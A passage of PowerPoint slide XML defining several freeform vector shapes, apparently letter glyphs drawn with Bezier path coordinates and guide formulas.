                <a:gd name="T34" fmla="*/ 171 w 227"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 227"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 95 w 227"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 95 w 227"/>
                <a:gd name="T41" fmla="*/ 12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7" h="218">
                  <a:moveTo>
                    <a:pt x="95" y="126"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="79"/>
                    <a:pt x="124" y="31"/>
                    <a:pt x="185" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="43"/>
                    <a:pt x="194" y="53"/>
                    <a:pt x="206" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="53"/>
                    <a:pt x="227" y="45"/>
                    <a:pt x="227" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="21"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="180" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="122" y="9"/>
                    <a:pt x="95" y="41"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="8"/>
                    <a:pt x="92" y="3"/>
                    <a:pt x="75" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="12" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="61" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="218"/>
                    <a:pt x="171" y="218"/>
                    <a:pt x="171" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="188"/>
                    <a:pt x="158" y="188"/>
                    <a:pt x="150" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="12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5" name="Freeform 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18E06316-6518-4A26-A406-467FEF9729D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId113"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3863975" y="2576513"/>
              <a:ext cx="90488" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 99 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 212"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 99 w 212"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 99 w 212"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 82 w 212"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 212"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 212"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 21 w 212"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 212"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 212"/>
                <a:gd name="T27" fmla="*/ 214 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 212"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 212 w 212"/>
                <a:gd name="T31" fmla="*/ 214 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 212"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 212"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 212"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 99 w 212"/>
                <a:gd name="T39" fmla="*/ 211 h 279"/>
                <a:gd name="T40" fmla="*/ 99 w 212"/>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79">
                  <a:moveTo>
                    <a:pt x="99" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="11"/>
                    <a:pt x="99" y="0"/>
                    <a:pt x="82" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="10"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="212" y="258"/>
                    <a:pt x="212" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="205"/>
                    <a:pt x="212" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="194"/>
                    <a:pt x="177" y="205"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="249"/>
                    <a:pt x="99" y="223"/>
                    <a:pt x="99" y="211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99"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6" name="Freeform 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C6BD11A-8FCE-43D1-B961-D38A677D0977}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId114"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4006850" y="2540000"/>
              <a:ext cx="55563" cy="200025"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 131 w 131"/>
                <a:gd name="T1" fmla="*/ 373 h 387"/>
                <a:gd name="T2" fmla="*/ 119 w 131"/>
                <a:gd name="T3" fmla="*/ 358 h 387"/>
                <a:gd name="T4" fmla="*/ 34 w 131"/>
                <a:gd name="T5" fmla="*/ 194 h 387"/>
                <a:gd name="T6" fmla="*/ 120 w 131"/>
                <a:gd name="T7" fmla="*/ 29 h 387"/>
                <a:gd name="T8" fmla="*/ 131 w 131"/>
                <a:gd name="T9" fmla="*/ 14 h 387"/>
                <a:gd name="T10" fmla="*/ 116 w 131"/>
                <a:gd name="T11" fmla="*/ 0 h 387"/>
                <a:gd name="T12" fmla="*/ 0 w 131"/>
                <a:gd name="T13" fmla="*/ 194 h 387"/>
                <a:gd name="T14" fmla="*/ 40 w 131"/>
                <a:gd name="T15" fmla="*/ 323 h 387"/>
                <a:gd name="T16" fmla="*/ 116 w 131"/>
                <a:gd name="T17" fmla="*/ 387 h 387"/>
                <a:gd name="T18" fmla="*/ 131 w 131"/>
                <a:gd name="T19" fmla="*/ 373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387">
                  <a:moveTo>
                    <a:pt x="131" y="373"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="366"/>
                    <a:pt x="128" y="364"/>
                    <a:pt x="119" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="316"/>
                    <a:pt x="34" y="250"/>
                    <a:pt x="34" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="144"/>
                    <a:pt x="53" y="74"/>
                    <a:pt x="120" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="23"/>
                    <a:pt x="131" y="22"/>
                    <a:pt x="131" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="10"/>
                    <a:pt x="129" y="0"/>
                    <a:pt x="116" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="0"/>
                    <a:pt x="0" y="66"/>
                    <a:pt x="0" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="253"/>
                    <a:pt x="23" y="298"/>
                    <a:pt x="40" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="359"/>
                    <a:pt x="104" y="387"/>
                    <a:pt x="116" y="387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="387"/>
                    <a:pt x="131" y="377"/>
                    <a:pt x="131" y="37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7" name="Freeform 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88FDA19A-2B42-4BE1-BED6-C28BF7409011}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId115"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4087813" y="2560638"/>
              <a:ext cx="101600" cy="158750"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 160 w 237"/>
                <a:gd name="T1" fmla="*/ 280 h 308"/>
                <a:gd name="T2" fmla="*/ 180 w 237"/>
                <a:gd name="T3" fmla="*/ 305 h 308"/>
                <a:gd name="T4" fmla="*/ 217 w 237"/>
                <a:gd name="T5" fmla="*/ 305 h 308"/>
                <a:gd name="T6" fmla="*/ 237 w 237"/>
                <a:gd name="T7" fmla="*/ 290 h 308"/>
                <a:gd name="T8" fmla="*/ 217 w 237"/>
                <a:gd name="T9" fmla="*/ 275 h 308"/>
                <a:gd name="T10" fmla="*/ 195 w 237"/>
                <a:gd name="T11" fmla="*/ 275 h 308"/>
                <a:gd name="T12" fmla="*/ 195 w 237"/>
                <a:gd name="T13" fmla="*/ 21 h 308"/>
                <a:gd name="T14" fmla="*/ 175 w 237"/>
                <a:gd name="T15" fmla="*/ 0 h 308"/>
                <a:gd name="T16" fmla="*/ 139 w 237"/>
                <a:gd name="T17" fmla="*/ 0 h 308"/>
                <a:gd name="T18" fmla="*/ 118 w 237"/>
                <a:gd name="T19" fmla="*/ 16 h 308"/>
                <a:gd name="T20" fmla="*/ 138 w 237"/>
                <a:gd name="T21" fmla="*/ 31 h 308"/>
                <a:gd name="T22" fmla="*/ 160 w 237"/>
                <a:gd name="T23" fmla="*/ 31 h 308"/>
                <a:gd name="T24" fmla="*/ 160 w 237"/>
                <a:gd name="T25" fmla="*/ 110 h 308"/>
                <a:gd name="T26" fmla="*/ 102 w 237"/>
                <a:gd name="T27" fmla="*/ 87 h 308"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 198 h 308"/>
                <a:gd name="T30" fmla="*/ 98 w 237"/>
                <a:gd name="T31" fmla="*/ 308 h 308"/>
                <a:gd name="T32" fmla="*/ 160 w 237"/>
                <a:gd name="T33" fmla="*/ 280 h 308"/>
                <a:gd name="T34" fmla="*/ 160 w 237"/>
                <a:gd name="T35" fmla="*/ 173 h 308"/>
                <a:gd name="T36" fmla="*/ 160 w 237"/>
                <a:gd name="T37" fmla="*/ 209 h 308"/>
                <a:gd name="T38" fmla="*/ 100 w 237"/>
                <a:gd name="T39" fmla="*/ 278 h 308"/>
                <a:gd name="T40" fmla="*/ 34 w 237"/>
                <a:gd name="T41" fmla="*/ 198 h 308"/>
                <a:gd name="T42" fmla="*/ 104 w 237"/>
                <a:gd name="T43" fmla="*/ 118 h 308"/>
                <a:gd name="T44" fmla="*/ 160 w 237"/>
                <a:gd name="T45" fmla="*/ 17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7" h="308">
                  <a:moveTo>
                    <a:pt x="160" y="280"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="298"/>
                    <a:pt x="160" y="305"/>
                    <a:pt x="180" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="217" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="305"/>
                    <a:pt x="237" y="305"/>
                    <a:pt x="237" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="275"/>
                    <a:pt x="224" y="275"/>
                    <a:pt x="217" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="5"/>
                    <a:pt x="192" y="0"/>
                    <a:pt x="175" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="0"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="118" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="31"/>
                    <a:pt x="131" y="31"/>
                    <a:pt x="138" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="160" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="110"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="95"/>
                    <a:pt x="124" y="87"/>
                    <a:pt x="102" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="87"/>
                    <a:pt x="0" y="135"/>
                    <a:pt x="0" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="260"/>
                    <a:pt x="45" y="308"/>
                    <a:pt x="98" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="308"/>
                    <a:pt x="147" y="295"/>
                    <a:pt x="160" y="280"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="160" y="173"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="160" y="209"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="237"/>
                    <a:pt x="138" y="278"/>
                    <a:pt x="100" y="278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="278"/>
                    <a:pt x="34" y="243"/>
                    <a:pt x="34" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="150"/>
                    <a:pt x="69" y="118"/>
                    <a:pt x="104" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="118"/>
                    <a:pt x="160" y="146"/>
                    <a:pt x="160" y="17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8" name="Freeform 68">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{620E2CBA-2AA7-4B56-A539-A11EA288E03C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId116"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4203700" y="2605088"/>
              <a:ext cx="85725" cy="114300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 204 w 204"/>
                <a:gd name="T1" fmla="*/ 112 h 222"/>
                <a:gd name="T2" fmla="*/ 102 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 204"/>
                <a:gd name="T5" fmla="*/ 112 h 222"/>
                <a:gd name="T6" fmla="*/ 102 w 204"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 204 w 204"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 102 w 204"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 34 w 204"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 102 w 204"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 204"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 102 w 204"/>
                <a:gd name="T19" fmla="*/ 1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22">
                  <a:moveTo>
                    <a:pt x="204" y="112"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="102" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="102" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="222"/>
                    <a:pt x="204" y="175"/>
                    <a:pt x="204" y="112"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="102" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="192"/>
                    <a:pt x="34" y="155"/>
                    <a:pt x="34" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="63"/>
                    <a:pt x="67" y="30"/>
                    <a:pt x="102" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="155"/>
                    <a:pt x="139" y="192"/>
                    <a:pt x="102"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79" name="Freeform 69">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D05DE5BF-C56D-4565-A4F9-D183F9F1603F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId117"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4318000" y="2605088"/>
              <a:ext cx="82550" cy="114300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 179 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 222"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 222"/>
                <a:gd name="T6" fmla="*/ 113 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 222"/>
                <a:gd name="T8" fmla="*/ 35 w 196"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 116 w 196"/>
                <a:gd name="T11" fmla="*/ 30 h 222"/>
                <a:gd name="T12" fmla="*/ 146 w 196"/>
                <a:gd name="T13" fmla="*/ 35 h 222"/>
                <a:gd name="T14" fmla="*/ 168 w 196"/>
                <a:gd name="T15" fmla="*/ 59 h 222"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 36 h 222"/>
                <a:gd name="T18" fmla="*/ 116 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 222"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 112 h 222"/>
                <a:gd name="T22" fmla="*/ 110 w 196"/>
                <a:gd name="T23" fmla="*/ 222 h 222"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25"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22">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="182" y="151"/>
                    <a:pt x="179" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="151"/>
                    <a:pt x="166" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="169"/>
                    <a:pt x="150" y="192"/>
                    <a:pt x="113" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="192"/>
                    <a:pt x="35" y="157"/>
                    <a:pt x="35" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="88"/>
                    <a:pt x="49" y="30"/>
                    <a:pt x="116" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="30"/>
                    <a:pt x="146" y="30"/>
                    <a:pt x="146" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="52"/>
                    <a:pt x="156" y="59"/>
                    <a:pt x="168" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="59"/>
                    <a:pt x="190" y="51"/>
                    <a:pt x="190" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="139" y="0"/>
                    <a:pt x="116" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="110" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222"/>
                    <a:pt x="196" y="174"/>
                    <a:pt x="196"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0" name="Freeform 70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18D672AC-4307-4D68-BCED-491AD27E0389}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId118"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4416425" y="2606675"/>
              <a:ext cx="104775" cy="112713"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 172 w 249"/>
                <a:gd name="T1" fmla="*/ 199 h 218"/>
                <a:gd name="T2" fmla="*/ 192 w 249"/>
                <a:gd name="T3" fmla="*/ 215 h 218"/>
                <a:gd name="T4" fmla="*/ 228 w 249"/>
                <a:gd name="T5" fmla="*/ 215 h 218"/>
                <a:gd name="T6" fmla="*/ 249 w 249"/>
                <a:gd name="T7" fmla="*/ 200 h 218"/>
                <a:gd name="T8" fmla="*/ 229 w 249"/>
                <a:gd name="T9" fmla="*/ 185 h 218"/>
                <a:gd name="T10" fmla="*/ 206 w 249"/>
                <a:gd name="T11" fmla="*/ 185 h 218"/>
                <a:gd name="T12" fmla="*/ 206 w 249"/>
                <a:gd name="T13" fmla="*/ 21 h 218"/>
                <a:gd name="T14" fmla="*/ 187 w 249"/>
                <a:gd name="T15" fmla="*/ 0 h 218"/>
                <a:gd name="T16" fmla="*/ 150 w 249"/>
                <a:gd name="T17" fmla="*/ 0 h 218"/>
                <a:gd name="T18" fmla="*/ 130 w 249"/>
                <a:gd name="T19" fmla="*/ 16 h 218"/>
                <a:gd name="T20" fmla="*/ 150 w 249"/>
                <a:gd name="T21" fmla="*/ 31 h 218"/>
                <a:gd name="T22" fmla="*/ 172 w 249"/>
                <a:gd name="T23" fmla="*/ 31 h 218"/>
                <a:gd name="T24" fmla="*/ 172 w 249"/>
                <a:gd name="T25" fmla="*/ 137 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 76 w 249"/>
                <a:gd name="T29" fmla="*/ 156 h 218"/>
                <a:gd name="T30" fmla="*/ 76 w 249"/>
                <a:gd name="T31" fmla="*/ 21 h 218"/>
                <a:gd name="T32" fmla="*/ 56 w 249"/>
                <a:gd name="T33" fmla="*/ 0 h 218"/>
                <a:gd name="T34" fmla="*/ 20 w 249"/>
                <a:gd name="T35" fmla="*/ 0 h 218"/>
                <a:gd name="T36" fmla="*/ 0 w 249"/>
                <a:gd name="T37" fmla="*/ 16 h 218"/>
                <a:gd name="T38" fmla="*/ 20 w 249"/>
                <a:gd name="T39" fmla="*/ 31 h 218"/>
                <a:gd name="T40" fmla="*/ 42 w 249"/>
                <a:gd name="T41" fmla="*/ 31 h 218"/>
                <a:gd name="T42" fmla="*/ 42 w 249"/>
                <a:gd name="T43" fmla="*/ 159 h 218"/>
                <a:gd name="T44" fmla="*/ 113 w 249"/>
                <a:gd name="T45" fmla="*/ 218 h 218"/>
                <a:gd name="T46" fmla="*/ 172 w 249"/>
                <a:gd name="T47" fmla="*/ 19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9" h="218">
                  <a:moveTo>
                    <a:pt x="172" y="199"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="215"/>
                    <a:pt x="183" y="215"/>
                    <a:pt x="192" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="228" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="215"/>
                    <a:pt x="249" y="215"/>
